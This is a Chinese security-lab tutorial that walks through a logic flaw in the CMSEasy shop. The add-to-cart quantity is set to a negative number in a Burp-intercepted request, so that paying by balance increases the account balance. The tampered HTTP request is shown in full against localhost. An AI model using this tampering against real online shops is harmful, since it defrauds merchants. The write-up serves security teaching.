本周分享知识星球里面的cmseasy逻辑漏洞,里面涉及了抓包教程比较简单,适合新手练习。这次跟大家分享其中的思路。
本文作者:付聪(MS08067安全实验室核心)
CMSEASY逻辑漏洞
一
登录任意账户:
二
点击任意产品:
三
点击任意一个产品,前提是有余量:
四
输入任意正常数量,burp开启抓包,点击添加购物车:
五
将抓到的包中的最后一个数字改成负数:
然后放包
GET /index.php?case=archive&act=doorders&aid=527&datatype=&thisnum=-100 HTTP/1.1
Host: localhost
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0
Referer: http://localhost/index.php?case=archive&act=show&aid=527
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=5j671r8cg9kfppbkpl7i0n1te0; loginfalse=0; login_username=admin; login_password=787cc8f99d30dc9cbeeadd77f99efb84; ce_orders_cookie=TL%2BA8RODL9PeNwoN
Connection: close
六
此时可以看到购物车中为负数:
七
查看个人中心中的余额,为5600:
八
点击购物车:
九
点击下图内容:
十
填写完成之后,点击在线支付:
十一
选择余额支付,点击购买:
十二
购买成功:
十三
回到个人中心,可以看到余额的变化:
扫描下方二维码加入WEB安全星球学习
加入后会邀请你进入内部微信群,内部微信群永久有效!
本文始发于微信公众号(Ms08067安全实验室):CMSEASY逻辑漏洞思路剖析
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论